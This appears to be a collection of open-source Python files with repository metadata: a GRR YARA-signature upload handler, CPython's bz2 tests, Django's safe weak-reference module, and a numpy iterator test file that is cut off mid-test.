#!/usr/bin/env python """A module with API handlers related to the YARA memory scanning.""" from grr_response_core.lib.rdfvalues import structs as rdf_structs from grr_response_proto.api import yara_pb2 from grr_response_server import data_store from grr_response_server.gui import api_call_context from grr_response_server.gui import api_call_handler_base from grr_response_server.rdfvalues import objects as rdf_objects class ApiUploadYaraSignatureArgs(rdf_structs.RDFProtoStruct): """An RDF wrapper class for arguments of YARA singature uploader.""" protobuf = yara_pb2.ApiUploadYaraSignatureArgs rdf_deps = [] class ApiUploadYaraSignatureResult(rdf_structs.RDFProtoStruct): """An RDF wrapper class for results of YARA signature uploader.""" protobuf = yara_pb2.ApiUploadYaraSignatureResult rdf_deps = [rdf_objects.BlobID] class ApiUploadYaraSignatureHandler(api_call_handler_base.ApiCallHandler): """An API handler for uploading YARA signatures.""" args_type = ApiUploadYaraSignatureArgs result_type = ApiUploadYaraSignatureResult def Handle( self, args: ApiUploadYaraSignatureArgs, context: api_call_context.ApiCallContext, ) -> ApiUploadYaraSignatureResult: blob = args.signature.encode("utf-8") blob_id = data_store.BLOBS.WriteBlobWithUnknownHash(blob) data_store.REL_DB.WriteYaraSignatureReference(blob_id, context.username) result = ApiUploadYaraSignatureResult() result.blob_id = blob_id return result
apache-2.0
sinkuri256/python-for-android
python3-alpha/python3-src/Lib/test/test_bz2.py
50
16089
#!/usr/bin/env python3 from test import support from test.support import TESTFN import unittest from io import BytesIO import os import subprocess import sys try: import threading except ImportError: threading = None # Skip tests if the bz2 module doesn't exist. bz2 = support.import_module('bz2') from bz2 import BZ2File, BZ2Compressor, BZ2Decompressor has_cmdline_bunzip2 = sys.platform not in ("win32", "os2emx") class BaseTest(unittest.TestCase): "Base for other testcases." TEXT = b'root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:\ndaemon:x:2:2:daemon:/sbin:\nadm:x:3:4:adm:/var/adm:\nlp:x:4:7:lp:/var/spool/lpd:\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:\nnews:x:9:13:news:/var/spool/news:\nuucp:x:10:14:uucp:/var/spool/uucp:\noperator:x:11:0:operator:/root:\ngames:x:12:100:games:/usr/games:\ngopher:x:13:30:gopher:/usr/lib/gopher-data:\nftp:x:14:50:FTP User:/var/ftp:/bin/bash\nnobody:x:65534:65534:Nobody:/home:\npostfix:x:100:101:postfix:/var/spool/postfix:\nniemeyer:x:500:500::/home/niemeyer:/bin/bash\npostgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\nmysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\nwww:x:103:104::/var/www:/bin/false\n' DATA = b'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`' DATA_CRLF = b'BZh91AY&SY\xaez\xbbN\x00\x01H\xdf\x80\x00\x12@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe0@\x01\xbc\xc6`\x86*\x8d=M\xa9\x9a\x86\xd0L@\x0fI\xa6!\xa1\x13\xc8\x88jdi\x8d@\x03@\x1a\x1a\x0c\x0c\x83 \x00\xc4h2\x19\x01\x82D\x84e\t\xe8\x99\x89\x19\x1ah\x00\r\x1a\x11\xaf\x9b\x0fG\xf5(\x1b\x1f?\t\x12\xcf\xb5\xfc\x95E\x00ps\x89\x12^\xa4\xdd\xa2&\x05(\x87\x04\x98\x89u\xe40%\xb6\x19\'\x8c\xc4\x89\xca\x07\x0e\x1b!\x91UIFU%C\x994!DI\xd2\xfa\xf0\xf1N8W\xde\x13A\xf5\x9cr%?\x9f3;I45A\xd1\x8bT\xb1<l\xba\xcb_\xc00xY\x17r\x17\x88\x08\x08@\xa0\ry@\x10\x04$)`\xf2\xce\x89z\xb0s\xec\x9b.iW\x9d\x81\xb5-+t\x9f\x1a\'\x97dB\xf5x\xb5\xbe.[.\xd7\x0e\x81\xe7\x08\x1cN`\x88\x10\xca\x87\xc3!"\x80\x92R\xa1/\xd1\xc0\xe6mf\xac\xbd\x99\xcca\xb3\x8780>\xa4\xc7\x8d\x1a\\"\xad\xa1\xabyBg\x15\xb9l\x88\x88\x91k"\x94\xa4\xd4\x89\xae*\xa6\x0b\x10\x0c\xd6\xd4m\xe86\xec\xb5j\x8a\x86j\';\xca.\x01I\xf2\xaaJ\xe8\x88\x8cU+t3\xfb\x0c\n\xa33\x13r2\r\x16\xe0\xb3(\xbf\x1d\x83r\xe7M\xf0D\x1365\xd8\x88\xd3\xa4\x92\xcb2\x06\x04\\\xc1\xb0\xea//\xbek&\xd8\xe6+t\xe5\xa1\x13\xada\x16\xder5"w]\xa2i\xb7[\x97R \xe2IT\xcd;Z\x04dk4\xad\x8a\t\xd3\x81z\x10\xf1:^`\xab\x1f\xc5\xdc\x91N\x14$+\x9e\xae\xd3\x80' if has_cmdline_bunzip2: def decompress(self, data): pop = subprocess.Popen("bunzip2", shell=True, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.STDOUT) pop.stdin.write(data) pop.stdin.close() ret = pop.stdout.read() pop.stdout.close() if pop.wait() != 0: ret = bz2.decompress(data) return ret else: # bunzip2 isn't available to run on Windows. def decompress(self, data): return bz2.decompress(data) class BZ2FileTest(BaseTest): "Test BZ2File type miscellaneous methods." def setUp(self): self.filename = TESTFN def tearDown(self): if os.path.isfile(self.filename): os.unlink(self.filename) def createTempFile(self, crlf=0): with open(self.filename, "wb") as f: if crlf: data = self.DATA_CRLF else: data = self.DATA f.write(data) def testRead(self): # "Test BZ2File.read()" self.createTempFile() with BZ2File(self.filename) as bz2f: self.assertRaises(TypeError, bz2f.read, None) self.assertEqual(bz2f.read(), self.TEXT) def testRead0(self): # Test BBZ2File.read(0)" self.createTempFile() with BZ2File(self.filename) as bz2f: self.assertRaises(TypeError, bz2f.read, None) self.assertEqual(bz2f.read(0), b"") def testReadChunk10(self): # "Test BZ2File.read() in chunks of 10 bytes" self.createTempFile() with BZ2File(self.filename) as bz2f: text = b'' while 1: str = bz2f.read(10) if not str: break text += str self.assertEqual(text, self.TEXT) def testRead100(self): # "Test BZ2File.read(100)" self.createTempFile() with BZ2File(self.filename) as bz2f: self.assertEqual(bz2f.read(100), self.TEXT[:100]) def testReadLine(self): # "Test BZ2File.readline()" self.createTempFile() with BZ2File(self.filename) as bz2f: self.assertRaises(TypeError, bz2f.readline, None) sio = BytesIO(self.TEXT) for line in sio.readlines(): self.assertEqual(bz2f.readline(), line) def testReadLines(self): # "Test BZ2File.readlines()" self.createTempFile() with BZ2File(self.filename) as bz2f: self.assertRaises(TypeError, bz2f.readlines, None) sio = BytesIO(self.TEXT) self.assertEqual(bz2f.readlines(), sio.readlines()) def testIterator(self): # "Test iter(BZ2File)" self.createTempFile() with BZ2File(self.filename) as bz2f: sio = BytesIO(self.TEXT) self.assertEqual(list(iter(bz2f)), sio.readlines()) def testClosedIteratorDeadlock(self): # "Test that iteration on a closed bz2file releases the lock." # http://bugs.python.org/issue3309 self.createTempFile() bz2f = BZ2File(self.filename) bz2f.close() self.assertRaises(ValueError, bz2f.__next__) # This call will deadlock of the above .__next__ call failed to # release the lock. self.assertRaises(ValueError, bz2f.readlines) def testWrite(self): # "Test BZ2File.write()" with BZ2File(self.filename, "w") as bz2f: self.assertRaises(TypeError, bz2f.write) bz2f.write(self.TEXT) with open(self.filename, 'rb') as f: self.assertEqual(self.decompress(f.read()), self.TEXT) def testWriteChunks10(self): # "Test BZ2File.write() with chunks of 10 bytes" with BZ2File(self.filename, "w") as bz2f: n = 0 while 1: str = self.TEXT[n*10:(n+1)*10] if not str: break bz2f.write(str) n += 1 with open(self.filename, 'rb') as f: self.assertEqual(self.decompress(f.read()), self.TEXT) def testWriteLines(self): # "Test BZ2File.writelines()" with BZ2File(self.filename, "w") as bz2f: self.assertRaises(TypeError, bz2f.writelines) sio = BytesIO(self.TEXT) bz2f.writelines(sio.readlines()) # patch #1535500 self.assertRaises(ValueError, bz2f.writelines, ["a"]) with open(self.filename, 'rb') as f: self.assertEqual(self.decompress(f.read()), self.TEXT) def testWriteMethodsOnReadOnlyFile(self): with BZ2File(self.filename, "w") as bz2f: bz2f.write(b"abc") with BZ2File(self.filename, "r") as bz2f: self.assertRaises(IOError, bz2f.write, b"a") self.assertRaises(IOError, bz2f.writelines, [b"a"]) def testSeekForward(self): # "Test BZ2File.seek(150, 0)" self.createTempFile() with BZ2File(self.filename) as bz2f: self.assertRaises(TypeError, bz2f.seek) bz2f.seek(150) self.assertEqual(bz2f.read(), self.TEXT[150:]) def testSeekBackwards(self): # "Test BZ2File.seek(-150, 1)" self.createTempFile() with BZ2File(self.filename) as bz2f: bz2f.read(500) bz2f.seek(-150, 1) self.assertEqual(bz2f.read(), self.TEXT[500-150:]) def testSeekBackwardsFromEnd(self): # "Test BZ2File.seek(-150, 2)" self.createTempFile() with BZ2File(self.filename) as bz2f: bz2f.seek(-150, 2) self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:]) def testSeekPostEnd(self): # "Test BZ2File.seek(150000)" self.createTempFile() with BZ2File(self.filename) as bz2f: bz2f.seek(150000) self.assertEqual(bz2f.tell(), len(self.TEXT)) self.assertEqual(bz2f.read(), b"") def testSeekPostEndTwice(self): # "Test BZ2File.seek(150000) twice" self.createTempFile() with BZ2File(self.filename) as bz2f: bz2f.seek(150000) bz2f.seek(150000) self.assertEqual(bz2f.tell(), len(self.TEXT)) self.assertEqual(bz2f.read(), b"") def testSeekPreStart(self): # "Test BZ2File.seek(-150, 0)" self.createTempFile() with BZ2File(self.filename) as bz2f: bz2f.seek(-150) self.assertEqual(bz2f.tell(), 0) self.assertEqual(bz2f.read(), self.TEXT) def testOpenDel(self): # "Test opening and deleting a file many times" self.createTempFile() for i in range(10000): o = BZ2File(self.filename) del o def testOpenNonexistent(self): # "Test opening a nonexistent file" self.assertRaises(IOError, BZ2File, "/non/existent") def testBug1191043(self): # readlines() for files containing no newline data = b'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t' with open(self.filename, "wb") as f: f.write(data) with BZ2File(self.filename) as bz2f: lines = bz2f.readlines() self.assertEqual(lines, [b'Test']) with BZ2File(self.filename) as bz2f: xlines = list(bz2f.readlines()) self.assertEqual(xlines, [b'Test']) def testContextProtocol(self): # BZ2File supports the context management protocol f = None with BZ2File(self.filename, "wb") as f: f.write(b"xxx") f = BZ2File(self.filename, "rb") f.close() try: with f: pass except ValueError: pass else: self.fail("__enter__ on a closed file didn't raise an exception") try: with BZ2File(self.filename, "wb") as f: 1/0 except ZeroDivisionError: pass else: self.fail("1/0 didn't raise an exception") @unittest.skipUnless(threading, 'Threading required for this test.') def testThreading(self): # Using a BZ2File from several threads doesn't deadlock (issue #7205). data = b"1" * 2**20 nthreads = 10 with bz2.BZ2File(self.filename, 'wb') as f: def comp(): for i in range(5): f.write(data) threads = [threading.Thread(target=comp) for i in range(nthreads)] for t in threads: t.start() for t in threads: t.join() def testMixedIterationReads(self): # Issue #8397: mixed iteration and reads should be forbidden. with bz2.BZ2File(self.filename, 'wb') as f: # The internal buffer size is hard-wired to 8192 bytes, we must # write out more than that for the test to stop half through # the buffer. f.write(self.TEXT * 100) with bz2.BZ2File(self.filename, 'rb') as f: next(f) self.assertRaises(ValueError, f.read) self.assertRaises(ValueError, f.readline) self.assertRaises(ValueError, f.readlines) class BZ2CompressorTest(BaseTest): def testCompress(self): # "Test BZ2Compressor.compress()/flush()" bz2c = BZ2Compressor() self.assertRaises(TypeError, bz2c.compress) data = bz2c.compress(self.TEXT) data += bz2c.flush() self.assertEqual(self.decompress(data), self.TEXT) def testCompressChunks10(self): # "Test BZ2Compressor.compress()/flush() with chunks of 10 bytes" bz2c = BZ2Compressor() n = 0 data = b'' while 1: str = self.TEXT[n*10:(n+1)*10] if not str: break data += bz2c.compress(str) n += 1 data += bz2c.flush() self.assertEqual(self.decompress(data), self.TEXT) class BZ2DecompressorTest(BaseTest): def test_Constructor(self): self.assertRaises(TypeError, BZ2Decompressor, 42) def testDecompress(self): # "Test BZ2Decompressor.decompress()" bz2d = BZ2Decompressor() self.assertRaises(TypeError, bz2d.decompress) text = bz2d.decompress(self.DATA) self.assertEqual(text, self.TEXT) def testDecompressChunks10(self): # "Test BZ2Decompressor.decompress() with chunks of 10 bytes" bz2d = BZ2Decompressor() text = b'' n = 0 while 1: str = self.DATA[n*10:(n+1)*10] if not str: break text += bz2d.decompress(str) n += 1 self.assertEqual(text, self.TEXT) def testDecompressUnusedData(self): # "Test BZ2Decompressor.decompress() with unused data" bz2d = BZ2Decompressor() unused_data = b"this is unused data" text = bz2d.decompress(self.DATA+unused_data) self.assertEqual(text, self.TEXT) self.assertEqual(bz2d.unused_data, unused_data) def testEOFError(self): # "Calling BZ2Decompressor.decompress() after EOS must raise EOFError" bz2d = BZ2Decompressor() text = bz2d.decompress(self.DATA) self.assertRaises(EOFError, bz2d.decompress, b"anything") class FuncTest(BaseTest): "Test module functions" def testCompress(self): # "Test compress() function" data = bz2.compress(self.TEXT) self.assertEqual(self.decompress(data), self.TEXT) def testDecompress(self): # "Test decompress() function" text = bz2.decompress(self.DATA) self.assertEqual(text, self.TEXT) def testDecompressEmpty(self): # "Test decompress() function with empty string" text = bz2.decompress(b"") self.assertEqual(text, b"") def testDecompressIncomplete(self): # "Test decompress() function with incomplete data" self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10]) def test_main(): support.run_unittest( BZ2FileTest, BZ2CompressorTest, BZ2DecompressorTest, FuncTest ) support.reap_children() if __name__ == '__main__': test_main() # vim:ts=4:sw=4
apache-2.0
lidavidm/mathics-heroku
venv/lib/python2.7/site-packages/django/dispatch/saferef.py
218
10623
""" "Safe weakrefs", originally from pyDispatcher. Provides a way to safely weakref any function, including bound methods (which aren't handled by the core weakref module). """ import traceback import weakref def safeRef(target, onDelete = None): """Return a *safe* weak reference to a callable target target -- the object to be weakly referenced, if it's a bound method reference, will create a BoundMethodWeakref, otherwise creates a simple weakref. onDelete -- if provided, will have a hard reference stored to the callable to be called after the safe reference goes out of scope with the reference object, (either a weakref or a BoundMethodWeakref) as argument. """ if hasattr(target, '__self__'): if target.__self__ is not None: # Turn a bound method into a BoundMethodWeakref instance. # Keep track of these instances for lookup by disconnect(). assert hasattr(target, '__func__'), """safeRef target %r has __self__, but no __func__, don't know how to create reference"""%( target,) reference = get_bound_method_weakref( target=target, onDelete=onDelete ) return reference if callable(onDelete): return weakref.ref(target, onDelete) else: return weakref.ref( target ) class BoundMethodWeakref(object): """'Safe' and reusable weak references to instance methods BoundMethodWeakref objects provide a mechanism for referencing a bound method without requiring that the method object itself (which is normally a transient object) is kept alive. Instead, the BoundMethodWeakref object keeps weak references to both the object and the function which together define the instance method. Attributes: key -- the identity key for the reference, calculated by the class's calculateKey method applied to the target instance method deletionMethods -- sequence of callable objects taking single argument, a reference to this object which will be called when *either* the target object or target function is garbage collected (i.e. when this object becomes invalid). These are specified as the onDelete parameters of safeRef calls. weakSelf -- weak reference to the target object weakFunc -- weak reference to the target function Class Attributes: _allInstances -- class attribute pointing to all live BoundMethodWeakref objects indexed by the class's calculateKey(target) method applied to the target objects. This weak value dictionary is used to short-circuit creation so that multiple references to the same (object, function) pair produce the same BoundMethodWeakref instance. """ _allInstances = weakref.WeakValueDictionary() def __new__( cls, target, onDelete=None, *arguments,**named ): """Create new instance or return current instance Basically this method of construction allows us to short-circuit creation of references to already- referenced instance methods. The key corresponding to the target is calculated, and if there is already an existing reference, that is returned, with its deletionMethods attribute updated. Otherwise the new instance is created and registered in the table of already-referenced methods. """ key = cls.calculateKey(target) current =cls._allInstances.get(key) if current is not None: current.deletionMethods.append( onDelete) return current else: base = super( BoundMethodWeakref, cls).__new__( cls ) cls._allInstances[key] = base base.__init__( target, onDelete, *arguments,**named) return base def __init__(self, target, onDelete=None): """Return a weak-reference-like instance for a bound method target -- the instance-method target for the weak reference, must have __self__ and __func__ attributes and be reconstructable via: target.__func__.__get__( target.__self__ ) which is true of built-in instance methods. onDelete -- optional callback which will be called when this weak reference ceases to be valid (i.e. either the object or the function is garbage collected). Should take a single argument, which will be passed a pointer to this object. """ def remove(weak, self=self): """Set self.isDead to true when method or instance is destroyed""" methods = self.deletionMethods[:] del self.deletionMethods[:] try: del self.__class__._allInstances[ self.key ] except KeyError: pass for function in methods: try: if callable( function ): function( self ) except Exception as e: try: traceback.print_exc() except AttributeError: print('Exception during saferef %s cleanup function %s: %s' % ( self, function, e) ) self.deletionMethods = [onDelete] self.key = self.calculateKey( target ) self.weakSelf = weakref.ref(target.__self__, remove) self.weakFunc = weakref.ref(target.__func__, remove) self.selfName = str(target.__self__) self.funcName = str(target.__func__.__name__) def calculateKey( cls, target ): """Calculate the reference key for this reference Currently this is a two-tuple of the id()'s of the target object and the target function respectively. """ return (id(target.__self__),id(target.__func__)) calculateKey = classmethod( calculateKey ) def __str__(self): """Give a friendly representation of the object""" return """%s( %s.%s )"""%( self.__class__.__name__, self.selfName, self.funcName, ) __repr__ = __str__ def __hash__(self): return hash(self.key) def __bool__( self ): """Whether we are still a valid reference""" return self() is not None def __nonzero__(self): # Python 2 compatibility return type(self).__bool__(self) def __eq__(self, other): """Compare with another reference""" if not isinstance(other, self.__class__): return self.__class__ == type(other) return self.key == other.key def __call__(self): """Return a strong reference to the bound method If the target cannot be retrieved, then will return None, otherwise returns a bound instance method for our object and function. Note: You may call this method any number of times, as it does not invalidate the reference. """ target = self.weakSelf() if target is not None: function = self.weakFunc() if function is not None: return function.__get__(target) return None class BoundNonDescriptorMethodWeakref(BoundMethodWeakref): """A specialized BoundMethodWeakref, for platforms where instance methods are not descriptors. It assumes that the function name and the target attribute name are the same, instead of assuming that the function is a descriptor. This approach is equally fast, but not 100% reliable because functions can be stored on an attribute named differenty than the function's name such as in: class A: pass def foo(self): return "foo" A.bar = foo But this shouldn't be a common use case. So, on platforms where methods aren't descriptors (such as Jython) this implementation has the advantage of working in the most cases. """ def __init__(self, target, onDelete=None): """Return a weak-reference-like instance for a bound method target -- the instance-method target for the weak reference, must have __self__ and __func__ attributes and be reconstructable via: target.__func__.__get__( target.__self__ ) which is true of built-in instance methods. onDelete -- optional callback which will be called when this weak reference ceases to be valid (i.e. either the object or the function is garbage collected). Should take a single argument, which will be passed a pointer to this object. """ assert getattr(target.__self__, target.__name__) == target, \ ("method %s isn't available as the attribute %s of %s" % (target, target.__name__, target.__self__)) super(BoundNonDescriptorMethodWeakref, self).__init__(target, onDelete) def __call__(self): """Return a strong reference to the bound method If the target cannot be retrieved, then will return None, otherwise returns a bound instance method for our object and function. Note: You may call this method any number of times, as it does not invalidate the reference. """ target = self.weakSelf() if target is not None: function = self.weakFunc() if function is not None: # Using partial() would be another option, but it erases the # "signature" of the function. That is, after a function is # curried, the inspect module can't be used to determine how # many arguments the function expects, nor what keyword # arguments it supports, and pydispatcher needs this # information. return getattr(target, function.__name__) return None def get_bound_method_weakref(target, onDelete): """Instantiates the appropiate BoundMethodWeakRef, depending on the details of the underlying class method implementation""" if hasattr(target, '__get__'): # target method is a descriptor, so the default implementation works: return BoundMethodWeakref(target=target, onDelete=onDelete) else: # no luck, use the alternative implementation: return BoundNonDescriptorMethodWeakref(target=target, onDelete=onDelete)
gpl-3.0
ChanderG/numpy
numpy/core/tests/test_nditer.py
85
103653
from __future__ import division, absolute_import, print_function import sys import warnings import numpy as np from numpy import array, arange, nditer, all from numpy.compat import asbytes, sixu from numpy.core.multiarray_tests import test_nditer_too_large from numpy.testing import ( run_module_suite, assert_, assert_equal, assert_array_equal, assert_raises, dec ) def iter_multi_index(i): ret = [] while not i.finished: ret.append(i.multi_index) i.iternext() return ret def iter_indices(i): ret = [] while not i.finished: ret.append(i.index) i.iternext() return ret def iter_iterindices(i): ret = [] while not i.finished: ret.append(i.iterindex) i.iternext() return ret def test_iter_refcount(): # Make sure the iterator doesn't leak # Basic a = arange(6) dt = np.dtype('f4').newbyteorder() rc_a = sys.getrefcount(a) rc_dt = sys.getrefcount(dt) it = nditer(a, [], [['readwrite', 'updateifcopy']], casting='unsafe', op_dtypes=[dt]) assert_(not it.iterationneedsapi) assert_(sys.getrefcount(a) > rc_a) assert_(sys.getrefcount(dt) > rc_dt) it = None assert_equal(sys.getrefcount(a), rc_a) assert_equal(sys.getrefcount(dt), rc_dt) # With a copy a = arange(6, dtype='f4') dt = np.dtype('f4') rc_a = sys.getrefcount(a) rc_dt = sys.getrefcount(dt) it = nditer(a, [], [['readwrite']], op_dtypes=[dt]) rc2_a = sys.getrefcount(a) rc2_dt = sys.getrefcount(dt) it2 = it.copy() assert_(sys.getrefcount(a) > rc2_a) assert_(sys.getrefcount(dt) > rc2_dt) it = None assert_equal(sys.getrefcount(a), rc2_a) assert_equal(sys.getrefcount(dt), rc2_dt) it2 = None assert_equal(sys.getrefcount(a), rc_a) assert_equal(sys.getrefcount(dt), rc_dt) del it2 # avoid pyflakes unused variable warning def test_iter_best_order(): # The iterator should always find the iteration order # with increasing memory addresses # Test the ordering for 1-D to 5-D shapes for shape in [(5,), (3, 4), (2, 3, 4), (2, 3, 4, 3), (2, 3, 2, 2, 3)]: a = arange(np.prod(shape)) # Test each combination of positive and negative strides for dirs in range(2**len(shape)): dirs_index = [slice(None)]*len(shape) for bit in range(len(shape)): if ((2**bit) & dirs): dirs_index[bit] = slice(None, None, -1) dirs_index = tuple(dirs_index) aview = a.reshape(shape)[dirs_index] # C-order i = nditer(aview, [], [['readonly']]) assert_equal([x for x in i], a) # Fortran-order i = nditer(aview.T, [], [['readonly']]) assert_equal([x for x in i], a) # Other order if len(shape) > 2: i = nditer(aview.swapaxes(0, 1), [], [['readonly']]) assert_equal([x for x in i], a) def test_iter_c_order(): # Test forcing C order # Test the ordering for 1-D to 5-D shapes for shape in [(5,), (3, 4), (2, 3, 4), (2, 3, 4, 3), (2, 3, 2, 2, 3)]: a = arange(np.prod(shape)) # Test each combination of positive and negative strides for dirs in range(2**len(shape)): dirs_index = [slice(None)]*len(shape) for bit in range(len(shape)): if ((2**bit) & dirs): dirs_index[bit] = slice(None, None, -1) dirs_index = tuple(dirs_index) aview = a.reshape(shape)[dirs_index] # C-order i = nditer(aview, order='C') assert_equal([x for x in i], aview.ravel(order='C')) # Fortran-order i = nditer(aview.T, order='C') assert_equal([x for x in i], aview.T.ravel(order='C')) # Other order if len(shape) > 2: i = nditer(aview.swapaxes(0, 1), order='C') assert_equal([x for x in i], aview.swapaxes(0, 1).ravel(order='C')) def test_iter_f_order(): # Test forcing F order # Test the ordering for 1-D to 5-D shapes for shape in [(5,), (3, 4), (2, 3, 4), (2, 3, 4, 3), (2, 3, 2, 2, 3)]: a = arange(np.prod(shape)) # Test each combination of positive and negative strides for dirs in range(2**len(shape)): dirs_index = [slice(None)]*len(shape) for bit in range(len(shape)): if ((2**bit) & dirs): dirs_index[bit] = slice(None, None, -1) dirs_index = tuple(dirs_index) aview = a.reshape(shape)[dirs_index] # C-order i = nditer(aview, order='F') assert_equal([x for x in i], aview.ravel(order='F')) # Fortran-order i = nditer(aview.T, order='F') assert_equal([x for x in i], aview.T.ravel(order='F')) # Other order if len(shape) > 2: i = nditer(aview.swapaxes(0, 1), order='F') assert_equal([x for x in i], aview.swapaxes(0, 1).ravel(order='F')) def test_iter_c_or_f_order(): # Test forcing any contiguous (C or F) order # Test the ordering for 1-D to 5-D shapes for shape in [(5,), (3, 4), (2, 3, 4), (2, 3, 4, 3), (2, 3, 2, 2, 3)]: a = arange(np.prod(shape)) # Test each combination of positive and negative strides for dirs in range(2**len(shape)): dirs_index = [slice(None)]*len(shape) for bit in range(len(shape)): if ((2**bit) & dirs): dirs_index[bit] = slice(None, None, -1) dirs_index = tuple(dirs_index) aview = a.reshape(shape)[dirs_index] # C-order i = nditer(aview, order='A') assert_equal([x for x in i], aview.ravel(order='A')) # Fortran-order i = nditer(aview.T, order='A') assert_equal([x for x in i], aview.T.ravel(order='A')) # Other order if len(shape) > 2: i = nditer(aview.swapaxes(0, 1), order='A') assert_equal([x for x in i], aview.swapaxes(0, 1).ravel(order='A')) def test_iter_best_order_multi_index_1d(): # The multi-indices should be correct with any reordering a = arange(4) # 1D order i = nditer(a, ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0,), (1,), (2,), (3,)]) # 1D reversed order i = nditer(a[::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(3,), (2,), (1,), (0,)]) def test_iter_best_order_multi_index_2d(): # The multi-indices should be correct with any reordering a = arange(6) # 2D C-order i = nditer(a.reshape(2, 3), ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 0), (0, 1), (0, 2), (1, 0), (1, 1), (1, 2)]) # 2D Fortran-order i = nditer(a.reshape(2, 3).copy(order='F'), ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 0), (1, 0), (0, 1), (1, 1), (0, 2), (1, 2)]) # 2D reversed C-order i = nditer(a.reshape(2, 3)[::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(1, 0), (1, 1), (1, 2), (0, 0), (0, 1), (0, 2)]) i = nditer(a.reshape(2, 3)[:, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 2), (0, 1), (0, 0), (1, 2), (1, 1), (1, 0)]) i = nditer(a.reshape(2, 3)[::-1, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(1, 2), (1, 1), (1, 0), (0, 2), (0, 1), (0, 0)]) # 2D reversed Fortran-order i = nditer(a.reshape(2, 3).copy(order='F')[::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(1, 0), (0, 0), (1, 1), (0, 1), (1, 2), (0, 2)]) i = nditer(a.reshape(2, 3).copy(order='F')[:, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 2), (1, 2), (0, 1), (1, 1), (0, 0), (1, 0)]) i = nditer(a.reshape(2, 3).copy(order='F')[::-1, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(1, 2), (0, 2), (1, 1), (0, 1), (1, 0), (0, 0)]) def test_iter_best_order_multi_index_3d(): # The multi-indices should be correct with any reordering a = arange(12) # 3D C-order i = nditer(a.reshape(2, 3, 2), ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 0, 0), (0, 0, 1), (0, 1, 0), (0, 1, 1), (0, 2, 0), (0, 2, 1), (1, 0, 0), (1, 0, 1), (1, 1, 0), (1, 1, 1), (1, 2, 0), (1, 2, 1)]) # 3D Fortran-order i = nditer(a.reshape(2, 3, 2).copy(order='F'), ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 0, 0), (1, 0, 0), (0, 1, 0), (1, 1, 0), (0, 2, 0), (1, 2, 0), (0, 0, 1), (1, 0, 1), (0, 1, 1), (1, 1, 1), (0, 2, 1), (1, 2, 1)]) # 3D reversed C-order i = nditer(a.reshape(2, 3, 2)[::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(1, 0, 0), (1, 0, 1), (1, 1, 0), (1, 1, 1), (1, 2, 0), (1, 2, 1), (0, 0, 0), (0, 0, 1), (0, 1, 0), (0, 1, 1), (0, 2, 0), (0, 2, 1)]) i = nditer(a.reshape(2, 3, 2)[:, ::-1], ['multi_index'], [['readonly']]) assert_equal(iter_multi_index(i), [(0, 2, 0), (0, 2, 1), (0, 1, 0), (0, 1, 1), (0, 0, 0), (0, 0, 1), (1, 2, 0), (1, 